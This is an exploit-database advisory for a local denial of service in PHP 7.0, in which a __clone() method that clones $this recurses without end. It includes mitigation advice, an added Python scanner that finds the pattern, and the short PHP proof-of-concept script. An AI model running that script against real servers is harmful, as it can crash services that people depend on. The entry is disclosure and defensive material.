Vendor: PHP
By: Yakir Wizman
CVSS: 7.5 (HIGH)
Local Denial of Service
CWE: 400
Product Name: PHP
Affected Version From: 7.0
Affected Version To: 7.0
Patch Exists: NO
Related CWE: N/A
CPE: a:php:php:7.0
Platforms Tested: Windows Server 2012 R2
2016

PHP 7.0 Object Cloning Local Denial of Service

A local denial of service vulnerability was discovered in PHP 7.0 when cloning an object. It occurs when an object is cloned and its class defines a __clone() method that itself clones $this, as in the proof of concept below: every clone invokes __clone() again, so the calls recurse in an infinite loop. This can be exploited to cause a denial of service condition.

Mitigation:

The best way to mitigate this vulnerability is to avoid defining the __clone() method in classes that are cloned.
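
To audit a code base for the pattern this entry's proof of concept uses, the following added example (not part of the original entry or of Exploit-DB) scans PHP source for a __clone() method that clones $this, while leaving the ordinary deep copy of a property (`clone $this->prop`) alone. The function names and sample classes are constructed for illustration; the scan is regex-based, so braces inside string literals and recursion through a helper method are outside what it handles.

```python
import re

# Start of a __clone() method, up to and including its opening brace.
CLONE_DEF = re.compile(r"function\s+__clone\s*\([^)]*\)\s*(?::\s*\w+\s*)?\{", re.I)
# `clone $this` or `clone($this)`, but not `clone $this->prop` (a normal deep copy).
SELF_CLONE = re.compile(r"\bclone\s*\(?\s*\$this\b(?!\s*->)", re.I)
# PHP comments; blanked (newlines kept) so commented-out code is not reported.
COMMENT = re.compile(r"/\*.*?\*/|(?://|#)[^\n]*", re.S)

def blank_comments(src):
    return COMMENT.sub(lambda m: re.sub(r"[^\n]", " ", m.group()), src)

def method_body(src, open_idx):
    """Return the text between the brace at open_idx and its matching close."""
    depth = 0
    for i in range(open_idx, len(src)):
        depth += {"{": 1, "}": -1}.get(src[i], 0)
        if depth == 0:
            return src[open_idx + 1:i]
    return src[open_idx + 1:]  # unbalanced source: scan to end of file

def find_self_cloning(src):
    """Return 1-based line numbers where a __clone() body clones $this."""
    src = blank_comments(src)
    hits = []
    for m in CLONE_DEF.finditer(src):
        start = m.end() - 1  # index of the method's opening brace
        body = method_body(src, start)
        for h in SELF_CLONE.finditer(body):
            hits.append(src.count("\n", 0, start + 1 + h.start()) + 1)
    return hits

# Constructed samples: the PoC's pattern, and a deep copy of a child property.
RECURSIVE = """<?php
class MyCloneableClass {
    public $obj;
    function __clone() {
        $this->obj = clone $this;
    }
}
"""
DEEP_COPY = """<?php
class Order {
    function __clone() {
        // clone $this; would recurse
        $this->customer = clone $this->customer;
    }
}
"""
```

`find_self_cloning(RECURSIVE)` reports line 5 of the sample, and `find_self_cloning(DEEP_COPY)` reports nothing.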

Exploit-DB raw data:

<?php
#############################################################################
## PHP 7.0 Object Cloning Local Denial of Service
## Tested on Windows Server 2012 R2 64bit, English, PHP 7.0
## Date: 26/08/2016
## Local Denial of Service
## Bug discovered by Yakir Wizman (https://www.linkedin.com/in/yakirwizman)
## http://www.black-rose.ml
#############################################################################
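class MyCloneableClass
{
    public $obj;

    // __clone() runs on every clone; cloning $this here re-enters
    // __clone() on the new copy, so the recursion never terminates.
    function __clone()
    {
        $this->obj = clone $this;
        return $this->obj;
    }
}

$obj  = new MyCloneableClass();
// The first clone starts the unbounded recursion.
$obj2 = clone $obj;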
?>